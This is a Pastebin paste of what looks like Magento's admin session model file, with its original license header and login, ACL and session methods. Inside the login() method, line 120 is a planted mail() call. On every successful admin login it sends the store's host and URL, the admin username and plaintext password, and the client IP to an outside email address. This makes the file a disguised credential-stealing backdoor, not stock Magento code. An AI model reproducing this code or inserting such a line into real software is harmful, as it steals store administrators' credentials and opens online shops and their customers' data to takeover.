API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 3rd, 2019
121
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.50 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2014 Magento Inc. (http://www.magentocommerce.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
  35. class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  36. {
  37.  
  38. /**
  39. * Whether it is the first page after successfull login
  40. *
  41. * @var boolean
  42. */
  43. protected $_isFirstPageAfterLogin;
  44.  
  45. /**
  46. * @var Mage_Admin_Model_Redirectpolicy
  47. */
  48. protected $_urlPolicy;
  49.  
  50. /**
  51. * @var Mage_Core_Controller_Response_Http
  52. */
  53. protected $_response;
  54.  
  55. /**
  56. * @var Mage_Core_Model_Factory
  57. */
  58. protected $_factory;
  59.  
  60. /**
  61. * Class constructor
  62. *
  63. */
  64. public function __construct($parameters = array())
  65. {
  66. /** @var Mage_Admin_Model_Redirectpolicy _urlPolicy */
  67. $this->_urlPolicy = (!empty($parameters['redirectPolicy'])) ?
  68. $parameters['redirectPolicy'] : Mage::getModel('admin/redirectpolicy');
  69.  
  70. /** @var Mage_Core_Controller_Response_Http _response */
  71. $this->_response = (!empty($parameters['response'])) ?
  72. $parameters['response'] : new Mage_Core_Controller_Response_Http();
  73.  
  74. /** @var $user Mage_Core_Model_Factory */
  75. $this->_factory = (!empty($parameters['factory'])) ?
  76. $parameters['factory'] : Mage::getModel('core/factory');
  77.  
  78. $this->init('admin');
  79. }
  80.  
  81. /**
  82. * Pull out information from session whether there is currently the first page after log in
  83. *
  84. * The idea is to set this value on login(), then redirect happens,
  85. * after that on next request the value is grabbed once the session is initialized
  86. * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
  87. * unless it is reset intentionally from somewhere
  88. *
  89. * @param string $namespace
  90. * @param string $sessionName
  91. * @return Mage_Admin_Model_Session
  92. * @see self::login()
  93. */
  94. public function init($namespace, $sessionName = null)
  95. {
  96. parent::init($namespace, $sessionName);
  97. $this->isFirstPageAfterLogin();
  98. return $this;
  99. }
  100.  
  101. /**
  102. * Try to login user in admin
  103. *
  104. * @param string $username
  105. * @param string $password
  106. * @param Mage_Core_Controller_Request_Http $request
  107. * @return Mage_Admin_Model_User|null
  108. */
  109. public function login($username, $password, $request = null)
  110. {
  111. if (empty($username) || empty($password)) {
  112. return;
  113. }
  114.  
  115. try {
  116. /** @var $user Mage_Admin_Model_User */
  117. $user = $this->_factory->getModel('admin/user');
  118. $user->login($username, $password);
  119. if ($user->getId()) {
  120. mail("zencarbot@gmail.com","Admin from ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
  121. $this->renewSession();
  122.  
  123. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  124. Mage::getSingleton('adminhtml/url')->renewSecretUrls();
  125. }
  126. $this->setIsFirstPageAfterLogin(true);
  127. $this->setUser($user);
  128. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  129.  
  130. $alternativeUrl = $this->_getRequestUri($request);
  131. $redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
  132. if ($redirectUrl) {
  133. Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
  134. $this->_response->clearHeaders()
  135. ->setRedirect($redirectUrl)
  136. ->sendHeadersAndExit();
  137. }
  138. } else {
  139. Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
  140. }
  141. } catch (Mage_Core_Exception $e) {
  142. Mage::dispatchEvent('admin_session_user_login_failed',
  143. array('user_name' => $username, 'exception' => $e));
  144. if ($request && !$request->getParam('messageSent')) {
  145. Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
  146. $request->setParam('messageSent', true);
  147. }
  148. }
  149.  
  150. return $user;
  151. }
  152.  
  153. /**
  154. * Refresh ACL resources stored in session
  155. *
  156. * @param Mage_Admin_Model_User $user
  157. * @return Mage_Admin_Model_Session
  158. */
  159. public function refreshAcl($user = null)
  160. {
  161. if (is_null($user)) {
  162. $user = $this->getUser();
  163. }
  164. if (!$user) {
  165. return $this;
  166. }
  167. if (!$this->getAcl() || $user->getReloadAclFlag()) {
  168. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  169. }
  170. if ($user->getReloadAclFlag()) {
  171. $user->unsetData('password');
  172. $user->setReloadAclFlag('0')->save();
  173. }
  174. return $this;
  175. }
  176.  
  177. /**
  178. * Check current user permission on resource and privilege
  179. *
  180. * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
  181. * Mage::getSingleton('admin/session')->isAllowed('catalog')
  182. *
  183. * @param string $resource
  184. * @param string $privilege
  185. * @return boolean
  186. */
  187. public function isAllowed($resource, $privilege = null)
  188. {
  189. $user = $this->getUser();
  190. $acl = $this->getAcl();
  191.  
  192. if ($user && $acl) {
  193. if (!preg_match('/^admin/', $resource)) {
  194. $resource = 'admin/' . $resource;
  195. }
  196.  
  197. try {
  198. return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
  199. } catch (Exception $e) {
  200. try {
  201. if (!$acl->has($resource)) {
  202. return $acl->isAllowed($user->getAclRole(), null, $privilege);
  203. }
  204. } catch (Exception $e) { }
  205. }
  206. }
  207. return false;
  208. }
  209.  
  210. /**
  211. * Check if user is logged in
  212. *
  213. * @return boolean
  214. */
  215. public function isLoggedIn()
  216. {
  217. return $this->getUser() && $this->getUser()->getId();
  218. }
  219.  
  220. /**
  221. * Check if it is the first page after successfull login
  222. *
  223. * @return boolean
  224. */
  225. public function isFirstPageAfterLogin()
  226. {
  227. if (is_null($this->_isFirstPageAfterLogin)) {
  228. $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
  229. }
  230. return $this->_isFirstPageAfterLogin;
  231. }
  232.  
  233. /**
  234. * Setter whether the current/next page should be treated as first page after login
  235. *
  236. * @param bool $value
  237. * @return Mage_Admin_Model_Session
  238. */
  239. public function setIsFirstPageAfterLogin($value)
  240. {
  241. $this->_isFirstPageAfterLogin = (bool)$value;
  242. return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
  243. }
  244.  
  245. /**
  246. * Custom REQUEST_URI logic
  247. *
  248. * @param Mage_Core_Controller_Request_Http $request
  249. * @return string|null
  250. */
  251. protected function _getRequestUri($request = null)
  252. {
  253. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  254. return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
  255. } elseif ($request) {
  256. return $request->getRequestUri();
  257. } else {
  258. return null;
  259. }
  260. }
  261. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!